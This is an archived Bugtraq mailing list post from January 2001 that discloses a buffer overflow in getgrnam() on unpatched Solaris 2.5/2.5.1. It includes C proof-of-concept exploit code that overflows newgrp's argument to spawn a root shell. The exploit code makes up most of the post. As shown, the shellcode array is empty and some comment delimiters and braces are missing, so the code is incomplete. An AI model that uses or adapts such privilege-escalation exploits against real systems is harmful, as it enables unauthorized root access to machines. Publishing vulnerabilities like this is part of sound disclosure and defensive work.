Home page logo

bugtraq logo Bugtraq mailing list archives

Old getgrnam() Solaris 2.5 vulnerability
From: Pablo Sor <psor () AFIP GOV AR>
Date: Thu, 4 Jan 2001 11:03:47 -0300


Old versions of Solaris, 2.5/2.5.1 (without patch) contain an
exploitable buffer overflow in getgrnam() libc function.
Sorry if this is already know, it seems an old problem but i failed
searching it in the bugtraq archives.
This vulnerability may be used in newgrp command.


Pablo Sor
psor () afip gov ar

#include <stdio.h>
#include <sys/types.h>

   getgrnam() function overflow.

   works against Solaris 2.5.1 (SPARC)
   default offset should work.

   Pablo Sor, Buenos Aires, Argentina.
   psor () afip gov ar


u_char shell[] =
u_long get_sp(void)
   __asm__("mov %sp,%i0 \n");

void main()

 long *p;
 long addr;
 char buf[8300];
 int i;

 addr = get_sp()-8096;
 printf("Jumping to address %p\n",addr);
 p = (long *) buf;
 for (i=0;i<2050;++i) *(p++) = 0xa61cc013;
 for (i=0;i<strlen(shell);++i) buf[104+i] = shell[i];
 p = (long *) &buf[8160];
 for (i=0;i<30;++i) *(p++) = addr;
 execl("/usr/bin/newgrp","newgrp",buf,(char *)0);


  By Date           By Thread  

Current thread:
  • Old getgrnam() Solaris 2.5 vulnerability Pablo Sor (Jan 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]